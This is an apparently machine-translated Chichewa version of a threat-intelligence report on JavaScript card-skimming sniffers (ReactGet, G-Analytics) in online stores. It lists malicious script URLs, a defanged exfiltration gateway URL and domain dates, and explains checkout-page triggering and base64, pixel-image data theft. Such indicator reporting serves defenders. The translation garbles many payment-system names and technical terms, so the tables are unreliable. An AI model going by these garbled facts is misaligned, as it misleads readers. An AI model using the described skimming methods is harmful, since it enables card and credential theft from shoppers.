🥇Zinayi zinayi za JavaScript zomwe zimakudikirirani m'masitolo apaintaneti

Pafupifupi tonsefe timagwiritsa ntchito malo ogulitsira pa intaneti, zomwe zikutanthauza kuti posakhalitsa timakhala pachiwopsezo chogwidwa ndi JavaScript sniffers - code yapadera yomwe owukira amakhazikitsa patsamba lawebusayiti kuti abe data yamakhadi aku banki, ma adilesi, ma logins ndi mapasiwedi a ogwiritsa ntchito. .

Pafupifupi ogwiritsa 400 a tsamba la British Airways ndi mafoni akhudzidwa kale ndi anthu onunkhiza, komanso alendo omwe adabwera patsamba la Britain la chimphona chamasewera FILA komanso wogawa matikiti ku America Ticketmaster. PayPal, Chase Paymenttech, USAePay, Moneris - awa ndi njira zina zambiri zolipirira zidakhudzidwa.

Katswiri wofufuza za Threat Intelligence Group-IB Viktor Okorokov akukamba za momwe anthu akununkhiza amalowetsa khodi ya webusayiti ndi kuba zidziwitso zolipira, komanso ma CRM omwe amawukira.

"Zowopsa zobisika"

Zidachitika kuti kwa nthawi yayitali a JS sniffers sanawonekere kwa akatswiri otsutsa ma virus, ndipo mabanki ndi machitidwe olipira sanawawone ngati chiwopsezo chachikulu. Ndipo kwathunthu pachabe. Akatswiri a Gulu-IB kusanthula Malo ogulitsa pa intaneti 2440 omwe ali ndi kachilomboka, omwe alendo awo - anthu pafupifupi 1,5 miliyoni patsiku - anali pachiwopsezo cha kunyengerera. Pakati pa ozunzidwawo si ogwiritsa ntchito okha, komanso masitolo a pa intaneti, machitidwe olipira ndi mabanki omwe amapereka makhadi osokonezeka.

Nenani Gulu-IB idakhala kafukufuku woyamba wamsika wamdima wakuda, zida zawo ndi njira zopangira ndalama, zomwe zimabweretsa omwe adawapanga mamiliyoni a madola. Tidazindikira mabanja 38 a osuta, omwe 12 okha ndi omwe adadziwika kale ndi ofufuza.

Tiyeni tikhazikike mwatsatanetsatane pa mabanja anayi a onunkhiza omwe aphunziridwa pa phunziroli.

ReactGet Banja

Onunkhiza a banja la ReactGet amagwiritsidwa ntchito kuba data yamakhadi aku banki pamasamba ogula pa intaneti. Wowotchera amatha kugwira ntchito ndi njira zambiri zolipirira zomwe zimagwiritsidwa ntchito patsambali: mtengo umodzi wofananira umagwirizana ndi njira imodzi yolipira, ndipo mitundu yodziwika ya munthu wosuta angagwiritsidwe ntchito kuba zidziwitso, komanso kuba zidziwitso zamakhadi aku banki pakulipira. mitundu ya machitidwe angapo olipira nthawi imodzi, monga otchedwa sniffer yapadziko lonse lapansi. Zinapezeka kuti nthawi zina, achiwembu amachita ziwopsezo zachinyengo kwa oyang'anira sitolo pa intaneti kuti azitha kulumikizana ndi oyang'anira webusayiti.

Kampeni yogwiritsa ntchito banja la osuta iyi idayamba mu Meyi 2017; masamba omwe ali ndi CMS ndi Magento, Bigcommerce, ndi nsanja za Shopify adawukiridwa.

Momwe ReactGet imagwiritsidwira ntchito mu code ya sitolo ya pa intaneti

Kuphatikiza pa kukhazikitsidwa kwa "classic" kwa script kudzera pa ulalo, ogwiritsira ntchito a ReactGet banja la osuta amagwiritsa ntchito njira yapadera: pogwiritsa ntchito JavaScript code, amafufuza ngati adiresi yomwe ilipo panopa yomwe wogwiritsa ntchitoyo ali nayo ikukwaniritsa zofunikira zina. Khodi yoyipa ingoperekedwa ngati chingwecho chilipo mu ulalo wapano Onani kapena sitepe imodzi yotuluka, tsamba limodzi/, kunja/onepag, tuluka/chimodzi, kukomoka/chimodzi. Chifukwa chake, nambala ya sniffer idzachitidwa ndendende panthawi yomwe wogwiritsa ntchitoyo amalipiritsa zogula ndikulowetsa zambiri zolipira mu fomu yomwe ili patsamba.

Wonunkhiza uyu amagwiritsa ntchito njira yosavomerezeka. Malipiro a wozunzidwayo ndi zidziwitso zaumwini zimasonkhanitsidwa pamodzi ndikusungidwa pogwiritsa ntchito zoyambira64, ndiyeno chingwe chotsatiracho chimagwiritsidwa ntchito ngati chizindikiro chotumizira pempho ku webusaiti ya owukira. Nthawi zambiri, njira yopita kuchipata imatsanzira fayilo ya JavaScript, mwachitsanzo resp.js, data.js ndi zina zotero, koma maulalo amafayilo azithunzi amagwiritsidwanso ntchito, GIF и JPG. Chodabwitsa ndichakuti wowomberayo amapanga chithunzi choyezera 1 ndi 1 pixel ndipo amagwiritsa ntchito ulalo womwe adalandira kale ngati parameter. src Zithunzi. Ndiko kuti, kwa wosuta pempho lotere mumsewu liwoneka ngati pempho la chithunzi wamba. Njira yofananayi idagwiritsidwa ntchito m'banja la ImageID la onunkhiza. Kuphatikiza apo, njira yogwiritsira ntchito chithunzi cha pixel ya 1 ndi 1 imagwiritsidwa ntchito m'malemba ambiri ovomerezeka a pa intaneti, omwe amathanso kusocheretsa wogwiritsa ntchito.

Kusanthula Baibulo

Kuwunika kwa madera omwe akugwiritsidwa ntchito ndi osuta a ReactGet adawulula mitundu yambiri yosiyanasiyana ya banja ili la onunkhiza. Mabaibulo amasiyana pakakhala kapena kusakhalapo kwa obfuscation, ndipo kuwonjezera apo, aliyense wowotchera amapangidwira njira yolipirira yomwe imayang'anira kulipira kwamakhadi aku banki m'masitolo apaintaneti. Atakonza mtengo wa parameter yogwirizana ndi nambala ya mtunduwo, akatswiri a Gulu-IB adalandira mndandanda wathunthu wamitundu yosiyanasiyana yomwe ilipo, ndipo ndi mayina a mafomu omwe wosuta aliyense amawayang'ana patsamba, adazindikira njira zolipirira. kuti wonunkhiza akulinga.

Mndandanda wa onunkhiza ndi njira zawo zolipirira

Ulalo wonyengerera	Malipiro dongosolo
reactjsapi.com/react.js	Lolani.Net
ajaxstatic.com/api.js?v=2.1.1	Wopulumutsa
ajaxstatic.com/api.js?v=2.1.2	Lolani.Net
ajaxstatic.com/api.js?v=2.1.3	Lolani.Net
ajaxstatic.com/api.js?v=2.1.4	eWAY Rapid
ajaxstatic.com/api.js?v=2.1.5	Lolani.Net
ajaxstatic.com/api.js?v=2.1.6	Adyen
ajaxstatic.com/api.js?v=2.1.7	USAePay
ajaxstatic.com/api.js?v=2.1.9	Lolani.Net
apittatus.com/api.js?v=2.1.1	USAePay
apittatus.com/api.js?v=2.1.2	Lolani.Net
apittatus.com/api.js?v=2.1.3	Moneris
apittatus.com/api.js?v=2.1.5	USAePay
apittatus.com/api.js?v=2.1.6	PayPal
apittatus.com/api.js?v=2.1.7	Malipiro a Sage
apittatus.com/api.js?v=2.1.8	Verisign
apittatus.com/api.js?v=2.1.9	PayPal
apittatus.com/api.js?v=2.3.0	Sungani
apittatus.com/api.js?v=3.0.2	Realex
apittatus.com/api.js?v=3.0.3	PayPal
apittatus.com/api.js?v=3.0.4	LinkPoint
apittatus.com/api.js?v=3.0.5	PayPal
apittatus.com/api.js?v=3.0.7	PayPal
apittatus.com/api.js?v=3.0.8	DataCash
apittatus.com/api.js?v=3.0.9	PayPal
asianfoodgracer.com/footer.js	Lolani.Net
billgetstatus.com/api.js?v=1.2	Lolani.Net
billgetstatus.com/api.js?v=1.3	Lolani.Net
billgetstatus.com/api.js?v=1.4	Lolani.Net
billgetstatus.com/api.js?v=1.5	Verisign
billgetstatus.com/api.js?v=1.6	Lolani.Net
billgetstatus.com/api.js?v=1.7	Moneris
billgetstatus.com/api.js?v=1.8	Malipiro a Sage
billgetstatus.com/api.js?v=2.0	USAePay
billgetstatus.com/react.js	Lolani.Net
Cloudodesc.com/gtm.js?v=1.2	Lolani.Net
Cloudodesc.com/gtm.js?v=1.3	ANZ eGate
Cloudodesc.com/gtm.js?v=2.3	Lolani.Net
Cloudodesc.com/gtm.js?v=2.4	Moneris
Cloudodesc.com/gtm.js?v=2.6	Malipiro a Sage
Cloudodesc.com/gtm.js?v=2.7	Malipiro a Sage
Cloudodesc.com/gtm.js?v=2.8	Chase Paymentech
Cloudodesc.com/gtm.js?v=2.9	Lolani.Net
Cloudodesc.com/gtm.js?v=2.91	Adyen
Cloudodesc.com/gtm.js?v=2.92	PsiGate
Cloudodesc.com/gtm.js?v=2.93	Cyber source
Cloudodesc.com/gtm.js?v=2.95	ANZ eGate
Cloudodesc.com/gtm.js?v=2.97	Realex
geissee.com/gs.js	USAePay
gtmproc.com/age.js	Lolani.Net
gtmproc.com/gtm.js?v=1.2	Lolani.Net
gtmproc.com/gtm.js?v=1.3	ANZ eGate
gtmproc.com/gtm.js?v=1.5	PayPal
gtmproc.com/gtm.js?v=1.6	PayPal
gtmproc.com/gtm.js?v=1.7	Realex
livecheckpay.com/api.js?v=2.0	Malipiro a Sage
livecheckpay.com/api.js?v=2.1	PayPal
livecheckpay.com/api.js?v=2.2	Verisign
livecheckpay.com/api.js?v=2.3	Lolani.Net
livecheckpay.com/api.js?v=2.4	Verisign
livecheckpay.com/react.js	Lolani.Net
livegetpay.com/pay.js?v=2.1.2	ANZ eGate
livegetpay.com/pay.js?v=2.1.3	PayPal
livegetpay.com/pay.js?v=2.1.5	Cyber source
livegetpay.com/pay.js?v=2.1.7	Lolani.Net
livegetpay.com/pay.js?v=2.1.8	Malipiro a Sage
livegetpay.com/pay.js?v=2.1.9	Realex
livegetpay.com/pay.js?v=2.2.0	Cyber source
livegetpay.com/pay.js?v=2.2.1	PayPal
livegetpay.com/pay.js?v=2.2.2	PayPal
livegetpay.com/pay.js?v=2.2.3	PayPal
livegetpay.com/pay.js?v=2.2.4	Verisign
livegetpay.com/pay.js?v=2.2.5	eWAY Rapid
livegetpay.com/pay.js?v=2.2.7	Malipiro a Sage
livegetpay.com/pay.js?v=2.2.8	Malipiro a Sage
livegetpay.com/pay.js?v=2.2.9	Verisign
livegetpay.com/pay.js?v=2.3.0	Lolani.Net
livegetpay.com/pay.js?v=2.3.1	Lolani.Net
livegetpay.com/pay.js?v=2.3.2	First Data Global Gateway
livegetpay.com/pay.js?v=2.3.3	Lolani.Net
livegetpay.com/pay.js?v=2.3.4	Lolani.Net
livegetpay.com/pay.js?v=2.3.5	Moneris
livegetpay.com/pay.js?v=2.3.6	Lolani.Net
livegetpay.com/pay.js?v=2.3.8	PayPal
livegetpay.com/pay.js?v=2.4.0	Verisign
maxstatics.com/site.js	USAePay
mediapack.info/track.js?d=funlove.com	USAePay
mediapack.info/track.js?d=qbedding.com	Lolani.Net
mediapack.info/track.js?d=vseyewear.com	Verisign
mxcounter.com/c.js?v=1.2	PayPal
mxcounter.com/c.js?v=1.3	Lolani.Net
mxcounter.com/c.js?v=1.4	Sungani
mxcounter.com/c.js?v=1.6	Lolani.Net
mxcounter.com/c.js?v=1.7	eWAY Rapid
mxcounter.com/c.js?v=1.8	Malipiro a Sage
mxcounter.com/c.js?v=2.0	Lolani.Net
mxcounter.com/c.js?v=2.1	Wopepuka
mxcounter.com/c.js?v=2.10	Wopepuka
mxcounter.com/c.js?v=2.2	PayPal
mxcounter.com/c.js?v=2.3	Malipiro a Sage
mxcounter.com/c.js?v=2.31	Malipiro a Sage
mxcounter.com/c.js?v=2.32	Lolani.Net
mxcounter.com/c.js?v=2.33	PayPal
mxcounter.com/c.js?v=2.34	Lolani.Net
mxcounter.com/c.js?v=2.35	Verisign
mxcounter.com/click.js?v=1.2	PayPal
mxcounter.com/click.js?v=1.3	Lolani.Net
mxcounter.com/click.js?v=1.4	Sungani
mxcounter.com/click.js?v=1.6	Lolani.Net
mxcounter.com/click.js?v=1.7	eWAY Rapid
mxcounter.com/click.js?v=1.8	Malipiro a Sage
mxcounter.com/click.js?v=2.0	Lolani.Net
mxcounter.com/click.js?v=2.1	Wopepuka
mxcounter.com/click.js?v=2.2	PayPal
mxcounter.com/click.js?v=2.3	Malipiro a Sage
mxcounter.com/click.js?v=2.31	Malipiro a Sage
mxcounter.com/click.js?v=2.32	Lolani.Net
mxcounter.com/click.js?v=2.33	PayPal
mxcounter.com/click.js?v=2.34	Lolani.Net
mxcounter.com/click.js?v=2.35	Verisign
mxcounter.com/cnt.js	Lolani.Net
mxcounter.com/j.js	Lolani.Net
newrelicnet.com/api.js?v=1.2	Lolani.Net
newrelicnet.com/api.js?v=1.4	Lolani.Net
newrelicnet.com/api.js?v=1.8	Malipiro a Sage
newrelicnet.com/api.js?v=4.5	Malipiro a Sage
newrelicnet.com/api.js?v=4.6	Westpac PayWay
nr-public.com/api.js?v=2.0	PayFort
nr-public.com/api.js?v=2.1	PayPal
nr-public.com/api.js?v=2.2	Lolani.Net
nr-public.com/api.js?v=2.3	Sungani
nr-public.com/api.js?v=2.4	First Data Global Gateway
nr-public.com/api.js?v=2.5	PsiGate
nr-public.com/api.js?v=2.6	Lolani.Net
nr-public.com/api.js?v=2.7	Lolani.Net
nr-public.com/api.js?v=2.8	Moneris
nr-public.com/api.js?v=2.9	Lolani.Net
nr-public.com/api.js?v=3.1	Malipiro a Sage
nr-public.com/api.js?v=3.2	Verisign
nr-public.com/api.js?v=3.3	Moneris
nr-public.com/api.js?v=3.5	PayPal
nr-public.com/api.js?v=3.6	LinkPoint
nr-public.com/api.js?v=3.7	Westpac PayWay
nr-public.com/api.js?v=3.8	Lolani.Net
nr-public.com/api.js?v=4.0	Moneris
nr-public.com/api.js?v=4.0.2	PayPal
nr-public.com/api.js?v=4.0.3	Adyen
nr-public.com/api.js?v=4.0.4	PayPal
nr-public.com/api.js?v=4.0.5	Lolani.Net
nr-public.com/api.js?v=4.0.6	USAePay
nr-public.com/api.js?v=4.0.7	EBizCharge
nr-public.com/api.js?v=4.0.8	Lolani.Net
nr-public.com/api.js?v=4.0.9	Verisign
nr-public.com/api.js?v=4.1.2	Verisign
ordercheckpays.com/api.js?v=2.11	Lolani.Net
ordercheckpays.com/api.js?v=2.12	PayPal
ordercheckpays.com/api.js?v=2.13	Moneris
ordercheckpays.com/api.js?v=2.14	Lolani.Net
ordercheckpays.com/api.js?v=2.15	PayPal
ordercheckpays.com/api.js?v=2.16	PayPal
ordercheckpays.com/api.js?v=2.17	Westpac PayWay
ordercheckpays.com/api.js?v=2.18	Lolani.Net
ordercheckpays.com/api.js?v=2.19	Lolani.Net
ordercheckpays.com/api.js?v=2.21	Malipiro a Sage
ordercheckpays.com/api.js?v=2.22	Verisign
ordercheckpays.com/api.js?v=2.23	Lolani.Net
ordercheckpays.com/api.js?v=2.24	PayPal
ordercheckpays.com/api.js?v=2.25	PayFort
ordercheckpays.com/api.js?v=2.29	Cyber source
ordercheckpays.com/api.js?v=2.4	PayPal Payflow Pro
ordercheckpays.com/api.js?v=2.7	Lolani.Net
ordercheckpays.com/api.js?v=2.8	Lolani.Net
ordercheckpays.com/api.js?v=2.9	Verisign
ordercheckpays.com/api.js?v=3.1	Lolani.Net
ordercheckpays.com/api.js?v=3.2	Lolani.Net
ordercheckpays.com/api.js?v=3.3	Malipiro a Sage
ordercheckpays.com/api.js?v=3.4	Lolani.Net
ordercheckpays.com/api.js?v=3.5	Sungani
ordercheckpays.com/api.js?v=3.6	Lolani.Net
ordercheckpays.com/api.js?v=3.7	Lolani.Net
ordercheckpays.com/api.js?v=3.8	Verisign
ordercheckpays.com/api.js?v=3.9	PayPal
ordercheckpays.com/api.js?v=4.0	Lolani.Net
ordercheckpays.com/api.js?v=4.1	Lolani.Net
ordercheckpays.com/api.js?v=4.2	Malipiro a Sage
ordercheckpays.com/api.js?v=4.3	Lolani.Net
reactjsapi.com/api.js?v=0.1.0	Lolani.Net
reactjsapi.com/api.js?v=0.1.1	PayPal
reactjsapi.com/api.js?v=4.1.2	mwala
reactjsapi.com/api.js?v=4.1.4	PayPal
reactjsapi.com/api.js?v=4.1.5	Malipiro a Sage
reactjsapi.com/api.js?v=4.1.51	Verisign
reactjsapi.com/api.js?v=4.1.6	Lolani.Net
reactjsapi.com/api.js?v=4.1.7	Lolani.Net
reactjsapi.com/api.js?v=4.1.8	Sungani
reactjsapi.com/api.js?v=4.1.9	Zovuta Zebra
reactjsapi.com/api.js?v=4.2.0	Malipiro a Sage
reactjsapi.com/api.js?v=4.2.1	Lolani.Net
reactjsapi.com/api.js?v=4.2.2	First Data Global Gateway
reactjsapi.com/api.js?v=4.2.3	Lolani.Net
reactjsapi.com/api.js?v=4.2.4	eWAY Rapid
reactjsapi.com/api.js?v=4.2.5	Adyen
reactjsapi.com/api.js?v=4.2.7	PayPal
reactjsapi.com/api.js?v=4.2.8	Ntchito Zamalonda a QuickBooks
reactjsapi.com/api.js?v=4.2.9	Verisign
reactjsapi.com/api.js?v=4.2.91	Malipiro a Sage
reactjsapi.com/api.js?v=4.2.92	Verisign
reactjsapi.com/api.js?v=4.2.94	Lolani.Net
reactjsapi.com/api.js?v=4.3.97	Lolani.Net
reactjsapi.com/api.js?v=4.5	Malipiro a Sage
reactjsapi.com/react.js	Lolani.Net
sydneysalonsupplies.com/gtm.js	eWAY Rapid
tagsmediaget.com/react.js	Lolani.Net
tagstracking.com/tag.js?v=2.1.2	ANZ eGate
tagstracking.com/tag.js?v=2.1.3	PayPal
tagstracking.com/tag.js?v=2.1.5	Cyber source
tagstracking.com/tag.js?v=2.1.7	Lolani.Net
tagstracking.com/tag.js?v=2.1.8	Malipiro a Sage
tagstracking.com/tag.js?v=2.1.9	Realex
tagstracking.com/tag.js?v=2.2.0	Cyber source
tagstracking.com/tag.js?v=2.2.1	PayPal
tagstracking.com/tag.js?v=2.2.2	PayPal
tagstracking.com/tag.js?v=2.2.3	PayPal
tagstracking.com/tag.js?v=2.2.4	Verisign
tagstracking.com/tag.js?v=2.2.5	eWAY Rapid
tagstracking.com/tag.js?v=2.2.7	Malipiro a Sage
tagstracking.com/tag.js?v=2.2.8	Malipiro a Sage
tagstracking.com/tag.js?v=2.2.9	Verisign
tagstracking.com/tag.js?v=2.3.0	Lolani.Net
tagstracking.com/tag.js?v=2.3.1	Lolani.Net
tagstracking.com/tag.js?v=2.3.2	First Data Global Gateway
tagstracking.com/tag.js?v=2.3.3	Lolani.Net
tagstracking.com/tag.js?v=2.3.4	Lolani.Net
tagstracking.com/tag.js?v=2.3.5	Moneris
tagstracking.com/tag.js?v=2.3.6	Lolani.Net
tagstracking.com/tag.js?v=2.3.8	PayPal

Wonunkhiza mawu achinsinsi

Chimodzi mwazabwino za osuta a JavaScript omwe amagwira ntchito kumbali ya kasitomala watsamba la webusayiti ndi kusinthasintha kwawo: nambala yoyipa yoyikidwa patsamba imatha kuba data yamtundu uliwonse, kaya ndalama zolipirira kapena kulowa ndi mawu achinsinsi a akaunti ya ogwiritsa ntchito. Akatswiri a Gulu-IB adapeza chitsanzo cha munthu wina wonunkhiza wa m'banja la ReactGet, yemwe adapangidwa kuti azibe ma adilesi a imelo ndi mawu achinsinsi a ogwiritsa ntchito patsamba.

Kudutsana ndi ImageID sniffer

Pakuwunika m'modzi mwa masitolo omwe ali ndi kachilomboka, zidapezeka kuti tsamba lake lidadwala kawiri: kuphatikiza pa code yoyipa ya banja la ReactGet, code of the ImageID family sniffer idapezeka. Kuphatikizikaku kutha kukhala umboni woti ogwiritsa ntchito kumbuyo kwa onsewo amagwiritsa ntchito njira zofananira pobaya nambala yoyipa.

Wonunkhiza wapadziko lonse

Kuwunika kwa amodzi mwa mayina amtundu wolumikizidwa ndi maziko a ReactGet sniffer kunawonetsa kuti wogwiritsa yemweyo adalembetsa mayina ena atatu. Madera atatuwa adatsanzira madera a mawebusayiti enieni ndipo m'mbuyomu adagwiritsidwa ntchito kuchititsa anthu osuta. Posanthula kachidindo ka malo atatu ovomerezeka, munthu wosuta wosadziwika adapezeka, ndipo kusanthula kwina kunawonetsa kuti inali mtundu wowongoleredwa wa ReactGet sniffer. Mabaibulo onse omwe ankayang'aniridwa m'mbuyomo a banja ili la osuta anali ndi ndondomeko ya malipiro amodzi, ndiko kuti, njira iliyonse yolipira inkafuna mtundu wapadera wa sniffer. Komabe, pankhaniyi, mtundu waponseponse wa sniffer unapezeka kuti amatha kuba zidziwitso kuchokera pamafomu okhudzana ndi 15 njira zosiyanasiyana zolipirira ndi ma module a e-commerce malo opangira ndalama pa intaneti.

Chifukwa chake, kumayambiriro kwa ntchitoyo, wosuta adafufuza magawo oyambira omwe ali ndi zidziwitso zamunthu wozunzidwayo: dzina lathunthu, adilesi yakuthupi, nambala yafoni.

Wonunkhizayo adasakanso ma prefixes osiyanasiyana 15 ogwirizana ndi njira zosiyanasiyana zolipirira komanso magawo olipira pa intaneti.

Kenako, zidziwitso za wozunzidwayo komanso zidziwitso zolipira zidasonkhanitsidwa pamodzi ndikutumizidwa kutsamba lomwe limayang'aniridwa ndi wowukirayo: pankhaniyi, mitundu iwiri ya sniffer yapadziko lonse ya ReactGet idapezeka, yomwe ili patsamba ziwiri zosiyana. Komabe, Mabaibulo onse anatumiza deta kubedwa yomweyo anadula malo zoobashop.com.

Kuwunikidwa kwa ma prefixes omwe wonunkhiritsa adagwiritsa ntchito posaka minda yokhala ndi zidziwitso zamalipiro za wozunzidwayo adatilola kudziwa kuti chitsanzo chonunkhizachi chinali ndi njira zolipirira zotsatirazi:

Lolani.Net
Verisign
Choyamba Data
USAePay
Sungani
PayPal
ANZ eGate
Wopepuka
DataCash (MasterCard)
Malipiro a Realex
PsiGate
Heartland Payment Systems

Ndi zida zotani zomwe zimagwiritsidwa ntchito pobera zidziwitso zamalipiro?

Chida choyamba, chomwe chidapezeka pakuwunika kwa owukirawo, chimagwiritsidwa ntchito kusokoneza zolemba zoyipa zomwe zidabera makhadi aku banki. Cholemba cha bash chogwiritsa ntchito CLI ya pulojekitiyi chinapezeka pa m'modzi mwa omwe adawukirawo Javascript-obfuscator kupangitsa kusokoneza kwa code sniffer.

Chida chachiwiri chomwe chapezeka chidapangidwa kuti chipange khodi yomwe ili ndi udindo wotsitsa sniffer yayikulu. Chidachi chimapanga JavaScript code yomwe imayang'ana ngati wogwiritsa ntchitoyo ali patsamba lolipira pofufuza adilesi yaposachedwa ya wogwiritsayo kuti apeze zingwe. Onani, ngolo ndi zina zotero, ndipo ngati zotsatira zake zili zabwino, ndiye kuti code imanyamula sniffer yaikulu kuchokera ku seva ya owukira. Kuti mubise zochitika zoyipa, mizere yonse, kuphatikiza mizere yoyesera kuti mudziwe tsamba lolipira, komanso ulalo wolozera, amasungidwa pogwiritsa ntchito zoyambira64.

Kuukira kwa Phishing

Kuwunika kwa maukonde omwe akuwukirawo adawonetsa kuti gulu la zigawenga nthawi zambiri limagwiritsa ntchito chinyengo kuti lipeze gulu loyang'anira malo ogulitsira pa intaneti. Zigawenga zimalembetsa madera omwe amafanana ndi malo ogulitsa, kenako amatumiza fomu yolowera pagulu labodza la Magento. Ngati zipambana, owukirawo adzapeza mwayi wopita ku gulu loyang'anira la Magento CMS, lomwe limawapatsa mwayi wosintha magawo awebusayiti ndikugwiritsa ntchito sniffer kuti abe data ya kirediti kadi.

Zachilengedwe

Kasitomala	Tsiku lodziwika/mawonekedwe
mediapack.info	04.05.2017
adsgetapi.com	15.06.2017
simcounter.com	14.08.2017
mageanalytics.com	22.12.2017
maxstatics.com	16.01.2018
reactjsapi.com	19.01.2018
mxcounter.com	02.02.2018
apittatus.com	01.03.2018
orderracker.com	20.04.2018
tagstracking.com	25.06.2018
adsapigate.com	12.07.2018
trust-tracker.com	15.07.2018
fbstatspartner.com	02.10.2018
billgetstatus.com	12.10.2018
www.aldenmlilhouse.com	20.10.2018
balletbeautlful.com	20.10.2018
bargalnjunkie.com	20.10.2018
payselector.com	21.10.2018
tagsmediaget.com	02.11.2018
hs-payments.com	16.11.2018
ordercheckpays.com	19.11.2018
geissee.com	24.11.2018
gtmproc.com	29.11.2018
livegetpay.com	18.12.2018
sydneysalonsupplies.com	18.12.2018
newrelicnet.com	19.12.2018
nr-public.com	03.01.2019
cloudodesc.com	04.01.2019
ajaxstatic.com	11.01.2019
livecheckpay.com	21.01.2019
asianfoodgracer.com	25.01.2019

G-Analytics Banja

Banja la onunkhiza ili limagwiritsidwa ntchito kuba makadi a kasitomala m'masitolo apaintaneti. Dzina loyamba lomwe linagwiritsidwa ntchito ndi gululi lidalembetsedwa mu Epulo 2016, zomwe zingasonyeze kuti gululi lidayamba ntchito mkati mwa 2016.

Pachitukuko chamakono, gululi limagwiritsa ntchito mayina a mayina omwe amatsanzira ntchito zenizeni, monga Google Analytics ndi jQuery, kubisa ntchito za osuta omwe ali ndi zolemba zovomerezeka ndi mayina a mayina ofanana ndi ovomerezeka. Masamba omwe akuyendetsa Magento CMS adawukiridwa.

Momwe G-Analytics imagwiritsidwira ntchito mu code ya sitolo ya pa intaneti

Chinthu chodziwika bwino cha banja ili ndi kugwiritsa ntchito njira zosiyanasiyana zoba zidziwitso zolipira. Kuphatikiza pa jakisoni wakale wa JavaScript pagawo lamakasitomala, gulu la zigawenga lidagwiritsanso ntchito njira zojambulira ma code pagawo la seva, zomwe ndi zolemba za PHP zomwe zimasanthula zomwe zalowetsedwa ndi ogwiritsa ntchito. Njira imeneyi ndi yoopsa chifukwa imapangitsa kuti ofufuza a chipani chachitatu azindikire zizindikiro zoipa. Akatswiri a Gulu-IB adapeza mtundu wa munthu wonunkhiza wophatikizidwa mu code ya PHP ya tsambalo, pogwiritsa ntchito domain ngati chipata. dittm.org.

Mtundu wakale wa munthu wonunkhiza adapezekanso yemwe amagwiritsa ntchito dera lomwelo kuti asonkhanitse deta yabedwa dittm.org, koma mtundu uwu wapangidwa kuti ukhazikike kumbali ya kasitomala pasitolo yapaintaneti.

Pambuyo pake gululo linasintha njira zake ndikuyamba kuyang'ana kwambiri kubisa zinthu zoipa ndi kubisala.

Kumayambiriro kwa 2017, gululi lidayamba kugwiritsa ntchito domain jquery-js.com, akuwoneka ngati CDN ya jQuery: popita kumalo omwe akuwukira, wogwiritsa ntchito amatumizidwa kumalo ovomerezeka. jquery.com.

Ndipo chapakati pa 2018, gululi lidatengera dzina la domain g-analytics.com ndipo anayamba kubisa ntchito za sniffer ngati ntchito yovomerezeka ya Google Analytics.

Kusanthula Baibulo

Pakuwunika kwa madambwe omwe amagwiritsidwa ntchito kusungirako code ya sniffer, zidapezeka kuti malowa ali ndi mitundu yambiri, yomwe imasiyana pamaso pa obfuscation, komanso kukhalapo kapena kusapezeka kwa code yosafikirika yomwe imawonjezeredwa pafayilo kuti isokoneze chidwi. ndi kubisa code yoyipa.

Zonse pamalowo jquery-js.com Mitundu isanu ndi umodzi ya onunkhiza adadziwika. Onunkhiza awa amatumiza zomwe zabedwa ku adilesi yomwe ili patsamba lomwelo monga wosuta yemweyo: hxxps://jquery-js[.]com/latest/jquery.min.js:

hxxps://jquery-js[.]com/jquery.min.js
hxxps://jquery-js[.]com/jquery.2.2.4.min.js
hxxps://jquery-js[.]com/jquery.1.8.3.min.js
hxxps://jquery-js[.]com/jquery.1.6.4.min.js
hxxps://jquery-js[.]com/jquery.1.4.4.min.js
hxxps://jquery-js[.]com/jquery.1.12.4.min.js

Kenako domain g-analytics.com, yomwe imagwiritsidwa ntchito ndi gululi pakuwukira kuyambira pakati pa 2018, imakhala ngati malo osungira anthu ambiri onunkhiza. Pazonse, mitundu 16 yosiyanasiyana ya sniffer idapezeka. Pachifukwa ichi, chipata chotumizira deta yobedwa chinabisidwa ngati ulalo wa mawonekedwe azithunzi GIF: hxxp://g-analytics[.]com/__utm.gif?v=1&_v=j68&a=98811130&t=pageview&_s=1&sd=24-bit&sr=2560×1440&vp=2145×371&je=0&_u=AACAAEAB~&jid=1841704724&gjid=877686936&cid
= 1283183910.1527732071:

hxxps://g-analytics[.]com/libs/1.0.1/analytics.js
hxxps://g-analytics[.]com/libs/1.0.10/analytics.js
hxxps://g-analytics[.]com/libs/1.0.11/analytics.js
hxxps://g-analytics[.]com/libs/1.0.12/analytics.js
hxxps://g-analytics[.]com/libs/1.0.13/analytics.js
hxxps://g-analytics[.]com/libs/1.0.14/analytics.js
hxxps://g-analytics[.]com/libs/1.0.15/analytics.js
hxxps://g-analytics[.]com/libs/1.0.16/analytics.js
hxxps://g-analytics[.]com/libs/1.0.3/analytics.js
hxxps://g-analytics[.]com/libs/1.0.4/analytics.js
hxxps://g-analytics[.]com/libs/1.0.5/analytics.js
hxxps://g-analytics[.]com/libs/1.0.6/analytics.js
hxxps://g-analytics[.]com/libs/1.0.7/analytics.js
hxxps://g-analytics[.]com/libs/1.0.8/analytics.js
hxxps://g-analytics[.]com/libs/1.0.9/analytics.js
hxxps://g-analytics[.]com/libs/analytics.js

Kupanga ndalama kwa data yabedwa

Gulu la zigawenga limapanga ndalama zomwe zabedwa pogulitsa makadi kudzera mu sitolo yapansi panthaka yomwe idapangidwa mwapadera yomwe imapereka chithandizo kwa ma makhadi. Kuwunika kwa madambwe omwe adawagwiritsa ntchito adatilola kudziwa izi google-analytics.cm adalembetsedwa ndi wogwiritsa ntchito yemweyo monga domeni cardz.vc. Domain cardz.vc amatanthauza sitolo yogulitsa makhadi akubanki omwe abedwa Cardsurfs (Flysurfs), omwe adadziwika kale m'masiku a ntchito ya nsanja yamalonda ya mobisa AlphaBay monga sitolo yogulitsa makhadi a banki abedwa pogwiritsa ntchito sniffer.

Kusanthula domain analytical.is, yomwe ili pa seva yofanana ndi madomeni omwe anthu osuta amagwiritsa ntchito kuti asonkhanitse deta yabedwa, akatswiri a Gulu-IB adapeza fayilo yomwe ili ndi zipika zakuba ma cookie, zomwe zikuwoneka kuti zidasiyidwa pambuyo pake ndi wopanga mapulogalamu. Chimodzi mwazolembazo chinali ndi domeni iozoz.com, yomwe idagwiritsidwa ntchito kale m'modzi mwa osuta omwe akugwira ntchito mu 2016. Mwina, domeni iyi idagwiritsidwa ntchito kale ndi wachiwembu kuti atole makhadi omwe abedwa pogwiritsa ntchito munthu wonunkhiza. Domeni iyi idalembetsedwa ku adilesi ya imelo [imelo ndiotetezedwa], yomwe idagwiritsidwanso ntchito kulembetsa madambwe cardz.su и cardz.vc, zokhudzana ndi sitolo yosungiramo makadi Makhadi.

